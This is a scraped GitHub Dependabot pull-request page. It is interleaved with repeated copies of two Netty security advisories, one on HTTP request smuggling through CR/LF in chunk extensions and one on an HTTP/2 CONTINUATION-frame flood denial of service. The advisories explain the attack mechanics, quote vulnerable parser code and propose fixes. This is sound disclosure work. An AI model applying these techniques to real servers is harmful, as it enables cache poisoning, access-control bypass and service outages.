You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.
Dependabot commands and options
You can trigger Dependabot actions by commenting on this PR:
@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
CR (%x0D) and LF (%x0A) bytes fall outside all of these ranges and are therefore not permitted inside chunk extensions—whether quoted or unquoted. A strictly compliant parser should reject any request containing CR or LF bytes before the actual line terminator within a chunk extension with a 400 Bad Request response (as Squid does, for example).
Vulnerability
Netty terminates chunk header parsing at \r\n inside quoted strings instead of rejecting the request as malformed. This creates a parsing differential between Netty and RFC-compliant parsers, which can be exploited for request smuggling.
Expected behavior (RFC-compliant):
A request containing CR/LF bytes within a chunk extension value should be rejected outright as invalid.
Actual behavior (Netty):
Chunk: 1;a="value
^^^^^ parsing terminates here at \r\n (INCORRECT)
Body: here"... is treated as body or the beginning of a subsequent request
The root cause is that Netty does not validate that CR/LF bytes are forbidden inside chunk extensions before the terminating CRLF. Rather than attempting to parse through quoted strings, the appropriate fix is to reject such requests entirely.
Result: The server returns two HTTP responses from a single TCP connection, confirming request smuggling.
Parsing Breakdown
Parser
Request 1
Request 2
Netty (vulnerable)
POST / body="X"
GET /smuggled (SMUGGLED)
RFC-compliant parser
400 Bad Request
(none — malformed request rejected)
Impact
Request Smuggling: An attacker can inject arbitrary HTTP requests into a connection.
Cache Poisoning: Smuggled responses may poison shared caches.
Access Control Bypass: Smuggled requests can circumvent frontend security controls.
Session Hijacking: Smuggled requests may intercept responses intended for other users.
Reproduction
Start the minimal proof-of-concept environment using the provided Docker configuration.
Execute the proof-of-concept script included in the attached archive.
Suggested Fix
The parser should reject requests containing CR or LF bytes within chunk extensions rather than attempting to interpret them:
1. Read chunk-size.
2. If ';' is encountered, begin parsing extensions:
a. For each byte before the terminating CRLF:
- If CR (%x0D) or LF (%x0A) is encountered outside the
final terminating CRLF, reject the request with 400 Bad Request.
b. If the extension value begins with DQUOTE, validate that all
enclosed bytes conform to the qdtext / quoted-pair grammar.
3. Only treat CRLF as the chunk header terminator when it appears
outside any quoted-string context and contains no preceding
illegal bytes.
Acknowledgments
Credit to Ben Kallus for clarifying the RFC interpretation during discussion on the HAProxy mailing list.
CR (%x0D) and LF (%x0A) bytes fall outside all of these ranges and are therefore not permitted inside chunk extensions—whether quoted or unquoted. A strictly compliant parser should reject any request containing CR or LF bytes before the actual line terminator within a chunk extension with a 400 Bad Request response (as Squid does, for example).
Vulnerability
Netty terminates chunk header parsing at \r\n inside quoted strings instead of rejecting the request as malformed. This creates a parsing differential between Netty and RFC-compliant parsers, which can be exploited for request smuggling.
Expected behavior (RFC-compliant):
A request containing CR/LF bytes within a chunk extension value should be rejected outright as invalid.
Actual behavior (Netty):
Chunk: 1;a="value
^^^^^ parsing terminates here at \r\n (INCORRECT)
Body: here"... is treated as body or the beginning of a subsequent request
The root cause is that Netty does not validate that CR/LF bytes are forbidden inside chunk extensions before the terminating CRLF. Rather than attempting to parse through quoted strings, the appropriate fix is to reject such requests entirely.
Result: The server returns two HTTP responses from a single TCP connection, confirming request smuggling.
Parsing Breakdown
Parser
Request 1
Request 2
Netty (vulnerable)
POST / body="X"
GET /smuggled (SMUGGLED)
RFC-compliant parser
400 Bad Request
(none — malformed request rejected)
Impact
Request Smuggling: An attacker can inject arbitrary HTTP requests into a connection.
Cache Poisoning: Smuggled responses may poison shared caches.
Access Control Bypass: Smuggled requests can circumvent frontend security controls.
Session Hijacking: Smuggled requests may intercept responses intended for other users.
Reproduction
Start the minimal proof-of-concept environment using the provided Docker configuration.
Execute the proof-of-concept script included in the attached archive.
Suggested Fix
The parser should reject requests containing CR or LF bytes within chunk extensions rather than attempting to interpret them:
1. Read chunk-size.
2. If ';' is encountered, begin parsing extensions:
a. For each byte before the terminating CRLF:
- If CR (%x0D) or LF (%x0A) is encountered outside the
final terminating CRLF, reject the request with 400 Bad Request.
b. If the extension value begins with DQUOTE, validate that all
enclosed bytes conform to the qdtext / quoted-pair grammar.
3. Only treat CRLF as the chunk header terminator when it appears
outside any quoted-string context and contains no preceding
illegal bytes.
Acknowledgments
Credit to Ben Kallus for clarifying the RFC interpretation during discussion on the HAProxy mailing list.
A remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of CONTINUATION frames. The server's lack of a limit on the number of CONTINUATION frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows an user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive.
Details
The vulnerability exists in Netty's DefaultHttp2FrameReader. When an HTTP/2 HEADERS frame is received without the END_HEADERS flag, the server expects one or more subsequent CONTINUATION frames. However, the implementation does not enforce a limit on the count of these CONTINUATION frames.
The key issue is located in codec-http2/src/main/java/io/netty/handler/codec/http2/DefaultHttp2FrameReader.java. The verifyContinuationFrame() method checks for stream association but fails to implement a frame count limit.
Any user can exploit this by sending a stream of CONTINUATION frames with a zero-byte payload. While Netty has a maxHeaderListSize protection to limit the total size of headers, this check is never triggered by zero-byte frames. The logic effectively evaluates to maxHeaderListSize - 0 < currentSize, which will not trigger the limit until a non-zero byte is added. As a result, the server is forced to process an unlimited number of frames, consuming a CPU thread and monopolizing the connection.
verifyContinuationFrame() (lines 381-393) — No frame count check:
privatevoidverifyContinuationFrame() throwsHttp2Exception {
verifyAssociatedWithAStream();
if (headersContinuation == null) {
throwconnectionError(PROTOCOL_ERROR, "...");
}
if (streamId != headersContinuation.getStreamId()) {
throwconnectionError(PROTOCOL_ERROR, "...");
}
// NO frame count limit!
}
HeadersBlockBuilder.addFragment() (lines 695-723) — Byte limit bypassed by 0-byte frames:
// Line 710-711: This check NEVER fires when len=0if (headersDecoder.configuration().maxHeaderListSizeGoAway() - len <
headerBlock.readableBytes()) {
headerSizeExceeded(); // 10240 - 0 < 1 => FALSE always
}
When len=0: maxGoAway - 0 < readableBytes → 10240 < 1 → FALSE. The byte limit is never triggered.
Impact
This is a CPU-based Denial of Service (DoS). Any service using Netty's default HTTP/2 server implementation is impacted. An unauthenticated user can exhaust server CPU resources and block legitimate users, leading to service unavailability. The low bandwidth requirement for the attack makes it highly practical.
A remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of CONTINUATION frames. The server's lack of a limit on the number of CONTINUATION frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows an user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive.
Details
The vulnerability exists in Netty's DefaultHttp2FrameReader. When an HTTP/2 HEADERS frame is received without the END_HEADERS flag, the server expects one or more subsequent CONTINUATION frames. However, the implementation does not enforce a limit on the count of these CONTINUATION frames.
The key issue is located in codec-http2/src/main/java/io/netty/handler/codec/http2/DefaultHttp2FrameReader.java. The verifyContinuationFrame() method checks for stream association but fails to implement a frame count limit.
Any user can exploit this by sending a stream of CONTINUATION frames with a zero-byte payload. While Netty has a maxHeaderListSize protection to limit the total size of headers, this check is never triggered by zero-byte frames. The logic effectively evaluates to maxHeaderListSize - 0 < currentSize, which will not trigger the limit until a non-zero byte is added. As a result, the server is forced to process an unlimited number of frames, consuming a CPU thread and monopolizing the connection.
verifyContinuationFrame() (lines 381-393) — No frame count check:
privatevoidverifyContinuationFrame() throwsHttp2Exception {
verifyAssociatedWithAStream();
if (headersContinuation == null) {
throwconnectionError(PROTOCOL_ERROR, "...");
}
if (streamId != headersContinuation.getStreamId()) {
throwconnectionError(PROTOCOL_ERROR, "...");
}
// NO frame count limit!
}
HeadersBlockBuilder.addFragment() (lines 695-723) — Byte limit bypassed by 0-byte frames:
// Line 710-711: This check NEVER fires when len=0if (headersDecoder.configuration().maxHeaderListSizeGoAway() - len <
headerBlock.readableBytes()) {
headerSizeExceeded(); // 10240 - 0 < 1 => FALSE always
}
When len=0: maxGoAway - 0 < readableBytes → 10240 < 1 → FALSE. The byte limit is never triggered.
Impact
This is a CPU-based Denial of Service (DoS). Any service using Netty's default HTTP/2 server implementation is impacted. An unauthenticated user can exhaust server CPU resources and block legitimate users, leading to service unavailability. The low bandwidth requirement for the attack makes it highly practical.
CR (%x0D) and LF (%x0A) bytes fall outside all of these ranges and are therefore not permitted inside chunk extensions—whether quoted or unquoted. A strictly compliant parser should reject any request containing CR or LF bytes before the actual line terminator within a chunk extension with a 400 Bad Request response (as Squid does, for example).
Vulnerability
Netty terminates chunk header parsing at \r\n inside quoted strings instead of rejecting the request as malformed. This creates a parsing differential between Netty and RFC-compliant parsers, which can be exploited for request smuggling.
Expected behavior (RFC-compliant):
A request containing CR/LF bytes within a chunk extension value should be rejected outright as invalid.
Actual behavior (Netty):
Chunk: 1;a="value
^^^^^ parsing terminates here at \r\n (INCORRECT)
Body: here"... is treated as body or the beginning of a subsequent request
The root cause is that Netty does not validate that CR/LF bytes are forbidden inside chunk extensions before the terminating CRLF. Rather than attempting to parse through quoted strings, the appropriate fix is to reject such requests entirely.
Result: The server returns two HTTP responses from a single TCP connection, confirming request smuggling.
Parsing Breakdown
Parser
Request 1
Request 2
Netty (vulnerable)
POST / body="X"
GET /smuggled (SMUGGLED)
RFC-compliant parser
400 Bad Request
(none — malformed request rejected)
Impact
Request Smuggling: An attacker can inject arbitrary HTTP requests into a connection.
Cache Poisoning: Smuggled responses may poison shared caches.
Access Control Bypass: Smuggled requests can circumvent frontend security controls.
Session Hijacking: Smuggled requests may intercept responses intended for other users.
Reproduction
Start the minimal proof-of-concept environment using the provided Docker configuration.
Execute the proof-of-concept script included in the attached archive.
Suggested Fix
The parser should reject requests containing CR or LF bytes within chunk extensions rather than attempting to interpret them:
1. Read chunk-size.
2. If ';' is encountered, begin parsing extensions:
a. For each byte before the terminating CRLF:
- If CR (%x0D) or LF (%x0A) is encountered outside the
final terminating CRLF, reject the request with 400 Bad Request.
b. If the extension value begins with DQUOTE, validate that all
enclosed bytes conform to the qdtext / quoted-pair grammar.
3. Only treat CRLF as the chunk header terminator when it appears
outside any quoted-string context and contains no preceding
illegal bytes.
Acknowledgments
Credit to Ben Kallus for clarifying the RFC interpretation during discussion on the HAProxy mailing list.
A remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of CONTINUATION frames. The server's lack of a limit on the number of CONTINUATION frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows an user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive.
Details
The vulnerability exists in Netty's DefaultHttp2FrameReader. When an HTTP/2 HEADERS frame is received without the END_HEADERS flag, the server expects one or more subsequent CONTINUATION frames. However, the implementation does not enforce a limit on the count of these CONTINUATION frames.
The key issue is located in codec-http2/src/main/java/io/netty/handler/codec/http2/DefaultHttp2FrameReader.java. The verifyContinuationFrame() method checks for stream association but fails to implement a frame count limit.
Any user can exploit this by sending a stream of CONTINUATION frames with a zero-byte payload. While Netty has a maxHeaderListSize protection to limit the total size of headers, this check is never triggered by zero-byte frames. The logic effectively evaluates to maxHeaderListSize - 0 < currentSize, which will not trigger the limit until a non-zero byte is added. As a result, the server is forced to process an unlimited number of frames, consuming a CPU thread and monopolizing the connection.
verifyContinuationFrame() (lines 381-393) — No frame count check:
privatevoidverifyContinuationFrame() throwsHttp2Exception {
verifyAssociatedWithAStream();
if (headersContinuation == null) {
throwconnectionError(PROTOCOL_ERROR, "...");
}
if (streamId != headersContinuation.getStreamId()) {
throwconnectionError(PROTOCOL_ERROR, "...");
}
// NO frame count limit!
}
HeadersBlockBuilder.addFragment() (lines 695-723) — Byte limit bypassed by 0-byte frames:
// Line 710-711: This check NEVER fires when len=0if (headersDecoder.configuration().maxHeaderListSizeGoAway() - len <
headerBlock.readableBytes()) {
headerSizeExceeded(); // 10240 - 0 < 1 => FALSE always
}
When len=0: maxGoAway - 0 < readableBytes → 10240 < 1 → FALSE. The byte limit is never triggered.
Impact
This is a CPU-based Denial of Service (DoS). Any service using Netty's default HTTP/2 server implementation is impacted. An unauthenticated user can exhaust server CPU resources and block legitimate users, leading to service unavailability. The low bandwidth requirement for the attack makes it highly practical.
dependabotBot
deleted the
dependabot/github_actions/aws-actions/aws-secretsmanager-get-secrets-3.0.0
branch
April 6, 2026 10:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Bumps aws-actions/aws-secretsmanager-get-secrets from 2.0.10 to 3.0.0.
Release notes
Sourced from aws-actions/aws-secretsmanager-get-secrets's releases.
Commits
3a411b6Bump version from 2.0.11 to 3.0.0 (#297)07435e3Remove actions/github, update actions/core (#299)bed0d09Update dependencies (#298)ca8dc62chore: Bump flatted from 3.3.3 to 3.4.2 (#295)9c2003cUpdate dependencies (#292)8d2df8dAdd versioned user-agent to AWS API calls (#272)aa511bffix: use OIDC for Codecov (#266)3f3c975Replace push dist/ with check dist/ (#256)Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting
@dependabot rebase.Dependabot commands and options
You can trigger Dependabot actions by commenting on this PR:
@dependabot rebasewill rebase this PR@dependabot recreatewill recreate this PR, overwriting any edits that have been made to it@dependabot show <dependency name> ignore conditionswill show all of the ignore conditions of the specified dependency@dependabot ignore this major versionwill close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)@dependabot ignore this minor versionwill close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)@dependabot ignore this dependencywill close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)